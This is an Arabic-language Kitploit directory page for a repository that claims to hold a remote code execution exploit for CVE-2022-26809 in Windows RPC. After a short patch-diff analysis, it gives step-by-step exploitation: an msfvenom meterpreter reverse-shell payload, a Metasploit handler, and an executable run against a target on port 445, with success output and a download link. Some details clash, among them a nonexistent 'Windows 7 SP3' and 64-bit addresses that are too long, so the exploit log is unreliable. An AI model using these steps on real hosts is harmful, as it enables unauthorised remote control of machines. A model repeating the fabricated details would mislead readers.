Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26810 — استغلال تنفيذ التعليمات البرمجية عن بُعد لـ CVE-2022-26809 يستهدف تجاوز سعة المخزن المؤقت للكومة في RPC لويندوز مع تكامل شيلكود msfvenom وتسليم حمولة قشرة عكسية meterpreter. | Kitploit
أدوات/GitHubGitHub/mr-alperen/cve-2022-26810
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كودما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubmr-alperen/cve-2022-26810

CVE-2022-26810

استغلال تنفيذ التعليمات البرمجية عن بُعد لـ CVE-2022-26809 يستهدف تجاوز سعة المخزن المؤقت للكومة في RPC لويندوز مع تكامل شيلكود msfvenom وتسليم حمولة قشرة عكسية meterpreter.

3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

استغلال CVE-2022-26809 (RCE)

وصف CVE

CVE-2022-26809 - ثغرة في مكوّن أساسي من مكونات Windows (RPC) حصلت على درجة CVSS بلغت 9.8 وليس من دون سبب؛ فالهجوم لا يتطلب مصادقة ويمكن تنفيذه عن بُعد عبر الشبكة، ويمكن أن يؤدي إلى تنفيذ الأوامر عن بُعد (RCE) بصلاحيات خدمة RPC، والتي تعتمد على العملية التي تستضيف بيئة تشغيل RPC. هذا الخطأ الحرج، مع القليل من الحظ، يسمح بالوصول إلى مضيف Windows غير محدّث يعمل بخدمة SMB. يمكن استغلال الثغرة من خارج الشبكة لاختراقها وكذلك بين الأجهزة الموجودة داخل الشبكة.

معلومات المورّد

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809

  • https://www.pwndefend.com/2022/04/14/cve-2022-26809/

من هم المعرضون للخطر؟

المضيفات المعرضة للخطر التي تم اختبارها:

  • Windows 10 Pro Build 10.0.10240 x64
  • Windows 10 Pro Build 10.0.19042 x64
  • Windows 10 Pro Build 10.0.19044 x64
  • Windows Server 2019 x64
  • Windows Server 2022 x64
  • Windows 7 SP3 x64

سنقوم بتحديث هذه القائمة لاحقًا. نشكّ في أن جميع الإصدارات تقريبًا التي تعمل بخدمة SMB ولديها منفذ 445 مفتوحًا ستتأثر.

منفذ RPC

root@kitploit:~
TCP 135,139,445

تحديد موضع الثغرة

تنص الثغرة CVE-2022-26809 على أن مواطن الضعف تقع داخل بيئة تشغيل RPC في Windows، والتي يتم تنفيذها في مكتبة باسم rpcrt4.dll. يتم تحميل هذه المكتبة في كلٍّ من عمليات العميل والخادم التي تستخدم بروتوكول RPC للاتصال. قارنّا الإصدارين 10.0.22000.434 (مارس) و10.0.22000.613 (المحدَّث) واستخرجنا قائمة بالتغييرات.

الدالتان OSF_SCALL::ProcessResponse وOSF_CCALL::ProcessReceivedPDU متشابهتان في طبيعتهما؛ كلتاهما تعالجان حزم RPC، لكن إحداهما تعمل على جانب الخادم والأخرى على جانب العميل (SCALL وCCALL). من خلال مقارنة (diffing) الدالة OSF_SCALL::ProcessReceivedPDU لاحظنا وجود كتلتين من التعليمات البرمجية أُضيفتا إلى الإصدار الجديد.

pic2

pic3_new

بالنظر إلى الكود المُحدَّث، رأينا أنه بعد QUEUE::PutOnQueue يتم استدعاء دالة جديدة. عند فحص الدالة الجديدة والتعمق في الكود الخاص بها، اكتشفنا أنها تتحقق من تجاوزات الأعداد الصحيحة. بعبارة أخرى، أُضيفت الدالة الجديدة في التحديث للتحقق من بقاء المتغير الصحيح ضمن نطاق القيم المتوقع.

pic1

بالتعمق أكثر في الكود المعرض للخطر داخل OSF_SCALL:GetCoalescedBuffer، لاحظنا أن خطأ تجاوز العدد الصحيح يمكن أن يؤدي إلى تجاوز سعة المخزن المؤقت في الكومة (heap buffer overflow)، حيث تُنسخ البيانات إلى مخزن مؤقت أصغر من اللازم لاستيعابها. وهذا بدوره يسمح بكتابة البيانات خارج حدود المخزن المؤقت على الكومة. عند استغلالها، تقودنا هذه الإمكانية إلى تنفيذ الأوامر عن بُعد!

تمت إضافة استدعاء مماثل للتحقق من تجاوز الأعداد الصحيحة في دوال أخرى أيضًا:

OSF_CCALL::ProcessResponse OSF_SCALL::GetCoalescedBuffer OSF_CCALL::GetCoalescedBuffer

ثغرة تجاوز الأعداد الصحيحة والدالة التي تمنعها موجودتان في كلٍّ من تدفقات التنفيذ على جانبي العميل والخادم.

الاستغلال

الخطوة 1

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.105 LPORT=4444 -f raw > shellcode.bin

الخطوة 2

root@kitploit:~
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.10.105
LHOST => 192.168.10.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

الاستغلال

CVE-2022-26809 ip port

root@kitploit:~
C:\>CVE-2022-26809.exe 192.168.10.110 445
CVE-2022-26809 RPC Remote Exploit
[+] Checking... 192.168.10.110 445
[+] 192.168.10.110 445 IsOpen
[+] found low stub at phys addr 6800!
[+] Pipe at 4ac660
[+] base of RPC heap at fffff79480048033
[+] ntoskrnl entry at fffff802435782060
[+] found Pipe self-ref entry 1eb
[+] found Alsr at fffff64480301671
[+] found RPC CALL at fffff802451b3b30
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff4ffc0033060
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff75006070a023!
[+] Try to execute shellcode!
[ ] Exploit Suceess!
تنزيل الأداة